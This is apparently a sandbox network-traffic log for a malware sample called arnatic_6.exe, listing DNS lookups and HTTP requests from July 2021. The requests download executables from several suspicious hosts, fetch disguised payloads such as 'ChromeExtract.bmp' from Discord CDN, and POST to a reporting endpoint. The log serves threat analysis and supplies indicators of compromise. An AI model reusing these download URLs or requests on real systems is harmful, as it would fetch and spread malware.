                                                                                                                                                                                        flamkravmaga.com
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        flamkravmaga.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        flamkravmaga.com
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        flamkravmaga.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        HEAD
                                                                                                                                                                                        http://www.quickfastfuriousloaded.com/campaign1/SunLabsPlayer.exe
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        89.221.213.3:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        HEAD /campaign1/SunLabsPlayer.exe HTTP/1.1
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                                                                                                                                        Host: www.quickfastfuriousloaded.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        HEAD
                                                                                                                                                                                        http://fikerty.info/app.exe
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        172.67.202.130:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        HEAD /app.exe HTTP/1.1
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                                                                                                                                        Host: fikerty.info
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:15:24 GMT
                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Location: https://fackerty.info/app.exe
                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=ZrtzrFcG6RqZLDuPT2OLBUhIvWqBrH8WNU%2BcqGJLkOu%2B80XQwODyiZxjZYxd6OwvahHEWmwguZak1d0CFNYT3NIeEcF%2BHe6Q3OKdMTXbbQdCqL3tVwhCjYDS"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 6686152d7d282ba1-FRA
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://fikerty.info/app.exe
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        172.67.202.130:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /app.exe HTTP/1.1
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                                                                                                                                        Host: fikerty.info
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:15:27 GMT
                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Location: https://fackerty.info/app.exe
                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=9yPD875bfR%2FkvsMLhCX6B3iHLEYwccTq1Jx%2FjddQzzFgSP4mi0SDQWeMl55XWZhYgW%2Fr%2FC7sP%2BawDPujW%2BrwcUcdxKbnnd3S9YJoGIMr0pIB5zcjJ38LBUr%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66861541cf1e2ba1-FRA
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        mebbing.com
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        mebbing.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        mebbing.com
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        mebbing.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        mebbing.com
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        mebbing.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        mebbing.com
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        mebbing.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        HEAD
                                                                                                                                                                                        http://name-usa.info/app/files/dc/id27315003/compan.exe
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        176.99.131.168:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        HEAD /app/files/dc/id27315003/compan.exe HTTP/1.1
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                                                                                                                                        Host: name-usa.info
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx/1.14.2
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:15:24 GMT
                                                                                                                                                                                        Content-Type: application/x-msdos-program
                                                                                                                                                                                        Content-Length: 1112064
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Last-Modified: Wed, 30 Jun 2021 20:09:14 GMT
                                                                                                                                                                                        ETag: "10f800-5c6014be6c331"
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://name-usa.info/app/files/dc/id27315003/compan.exe
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        176.99.131.168:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /app/files/dc/id27315003/compan.exe HTTP/1.1
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                                                                                                                                        Host: name-usa.info
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx/1.14.2
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:15:24 GMT
                                                                                                                                                                                        Content-Type: application/x-msdos-program
                                                                                                                                                                                        Content-Length: 1112064
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Last-Modified: Wed, 30 Jun 2021 20:09:14 GMT
                                                                                                                                                                                        ETag: "10f800-5c6014be6c331"
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:15:24 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07ab91e900001e65cf069000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=8IxKeX7wbVwtiRkz7WEhCcO0oF7ZnkHcjc3ddMydTwY4lQa1OoIGOAfvsOw2ceXwRtLBij%2BfTXu2bEl72xX8WUiItNpJwETykvlUZbDI8lq5Vg8yz43fanOLMj2upQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 6686152fd9a91e65-MUC
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        fackerty.info
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        fackerty.info
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        fackerty.info
                                                                                                                                                                                        IN A
                                                                                                                                                                                        172.67.155.53
                                                                                                                                                                                        fackerty.info
                                                                                                                                                                                        IN A
                                                                                                                                                                                        104.21.89.3
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        HEAD
                                                                                                                                                                                        https://fackerty.info/app.exe
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        172.67.155.53:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        HEAD /app.exe HTTP/1.1
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Host: fackerty.info
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:15:26 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07ab9a220000d6c9150df000000001
                                                                                                                                                                                        Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=Pn3fc2xNhKhjgZO0VG9ow%2BfhdrhWVzfoQ4NuM46dhE5BFYQSMfCCIQIJsb%2F%2FZQnrFlMJYJM5%2B80NINqGi%2F0NBjlfopku4Xus%2FhonIUsM%2BnMlSMMrZ7dJnvRgXQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 6686153d0bcfd6c9-FRA
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://jom.diregame.live/userf/2201/google-game.exe
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.65.45:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /userf/2201/google-game.exe HTTP/1.1
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                                                                                                                                        Host: jom.diregame.live
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:15:28 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07ab9fa10000324c711c6000000001
                                                                                                                                                                                        Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=gXWLSlcS0VsI0G3Mz3VtUxSDaaYQWLDDUsW45qt1u6mcDokm40lAwkSw3WlPqQJmQUk0Mm%2FlEEPvYwuRP%2BuBZNIHeC2XAbQHMUvlajH8ert7p35abZDGauWv%2FnpJj3E%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66861545ced1324c-FRA
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://www.quickfastfuriousloaded.com/campaign1/SunLabsPlayer.exe
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        89.221.213.3:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /campaign1/SunLabsPlayer.exe HTTP/1.1
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                                                                                                                                        Host: www.quickfastfuriousloaded.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://185.20.227.194/install.exe
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.20.227.194:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /install.exe HTTP/1.1
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                                                                                                                                        Host: 185.20.227.194
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        flamkravmaga.com
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        flamkravmaga.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        flamkravmaga.com
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        flamkravmaga.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        flamkravmaga.com
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        flamkravmaga.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        flamkravmaga.com
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        flamkravmaga.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://fackerty.info/app.exe
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        172.67.155.53:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /app.exe HTTP/1.1
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Host: fackerty.info
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:15:29 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07aba4fb00002ba1f2af0000000001
                                                                                                                                                                                        Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=4GI%2Fu3yrHNVqv8Ndh8N5gclxwCzzu68n1%2FRpnLYBsC1WgSkfIk8EY2krHkQ14JlrgOHxiCddjxi5RDsKUo2rr9sdcdQTAmMATkMUQbDp%2BLKdHoYCHqgc9yJ8hA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 6686154e59512ba1-FRA
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        twcamel.com
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        twcamel.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        twcamel.com
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        twcamel.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        twcamel.com
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        twcamel.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        twcamel.com
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        twcamel.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://cdn.discordapp.com/attachments/855697945679888404/860411180802899998/file2.bmp
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        162.159.135.233:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /attachments/855697945679888404/860411180802899998/file2.bmp HTTP/1.1
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                                                                                                                                        Host: cdn.discordapp.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:15:32 GMT
                                                                                                                                                                                        Content-Type: image/x-ms-bmp
                                                                                                                                                                                        Content-Length: 630784
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        CF-Ray: 6686155f0d8096f2-FRA
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        Age: 1147
                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                        Content-Disposition: attachment;%20filename=file2.bmp
                                                                                                                                                                                        ETag: "647266eb24785b16c9fb54bc3040dd62"
                                                                                                                                                                                        Expires: Sat, 02 Jul 2022 07:15:32 GMT
                                                                                                                                                                                        Last-Modified: Fri, 02 Jul 2021 06:46:51 GMT
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                        Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                        Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                        x-goog-generation: 1625208411232606
                                                                                                                                                                                        x-goog-hash: crc32c=1IN/4Q==
                                                                                                                                                                                        x-goog-hash: md5=ZHJm6yR4WxbJ+1S8MEDdYg==
                                                                                                                                                                                        x-goog-metageneration: 1
                                                                                                                                                                                        x-goog-storage-class: STANDARD
                                                                                                                                                                                        x-goog-stored-content-encoding: identity
                                                                                                                                                                                        x-goog-stored-content-length: 630784
                                                                                                                                                                                        X-GUploader-UploadID: ADPycdvQImk4lSQOB0d63DeyLPcTuzoSHdFCzwrmCQoPPL6gE4iltQX98neiNbfzGtmjAQYYSM5LcCtB-qY4-cQSUYQ
                                                                                                                                                                                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=jh2415fJpFyRAzSAlh5HJbvavuTry3V4jFswOLmXGzl8yCAF0iSVy9kpffSMP%2BvSTekDyiOeOxnVOUaJSG6bJElqsp1ByaV2TWyDO0q5Enkzno4P3FW%2Bn50dqoQJG6E%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://cdn.discordapp.com/attachments/855697945679888404/859709260588646410/ChromeExtract.bmp
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        162.159.135.233:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /attachments/855697945679888404/859709260588646410/ChromeExtract.bmp HTTP/1.1
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                                                                                                                                        Host: cdn.discordapp.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:15:33 GMT
                                                                                                                                                                                        Content-Type: image/x-ms-bmp
                                                                                                                                                                                        Content-Length: 289280
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        CF-Ray: 6686156788f6061c-FRA
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        Age: 168447
                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                        Content-Disposition: attachment;%20filename=ChromeExtract.bmp
                                                                                                                                                                                        ETag: "34acd79244e9ab3ec01135b4d1120e4a"
                                                                                                                                                                                        Expires: Sat, 02 Jul 2022 07:15:33 GMT
                                                                                                                                                                                        Last-Modified: Wed, 30 Jun 2021 08:17:40 GMT
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                        Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                        Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                        x-goog-generation: 1625041060400438
                                                                                                                                                                                        x-goog-hash: crc32c=cOjqGw==
                                                                                                                                                                                        x-goog-hash: md5=NKzXkkTpqz7AETW00RIOSg==
                                                                                                                                                                                        x-goog-metageneration: 1
                                                                                                                                                                                        x-goog-storage-class: STANDARD
                                                                                                                                                                                        x-goog-stored-content-encoding: identity
                                                                                                                                                                                        x-goog-stored-content-length: 289280
                                                                                                                                                                                        X-GUploader-UploadID: ADPycdsULRLfAw9q93SVhRNB4Vpz-F7McF5Fn9qoOYJxLB-dRfWSIXSxplIU75pzYfkUl1lt395qIeyzbglAt8YTzwc
                                                                                                                                                                                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=2oV9h57nPR2xYOyN6iBa%2BC23lMEY5kh2safK4KS77tLNT1GjOaBR2EQP5ElxwqOBwQaLNfKrJAkB158j4TK3kVqhvApvgz10zSuIuHKlwn6dQiFJrOeVp0BHo3x7fqw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
